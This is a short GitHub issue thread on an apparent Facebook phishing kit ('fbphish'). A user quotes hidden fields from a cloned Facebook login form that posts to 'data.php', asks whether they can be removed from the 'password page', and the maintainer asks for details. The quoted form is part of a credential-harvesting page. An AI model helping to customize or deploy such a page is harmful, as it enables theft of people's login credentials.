### ISSUE TITLE
Want to ask about this code

### ISSUE THREAD

**Issue by dedekganteng** [0xyg3n/fbphish#4]
Hello, can i remove this code?
<form method="post" action="data.php">
                                    <input type="hidden" name="lsd" value="AVqvqJXp" autocomplete="off" />
                                    <input type="hidden" name="m_ts" value="1507496641" />
                                    <input type="hidden" name="li" value="wZLaWcpDaOWtioU_JuAc-rm1" />
                                    <input type="hidden" name="try_number" value="0" data-sigil="m_login_try_number" />
                                    <input type="hidden" name="unrecognized_tries" value="0" data-sigil="m_login_unrecognized_tries" />

bcos that take more space on password page
and what mean for that code?

**Comment by 0xyg3n** [comment]
Which code? Provide more information please.
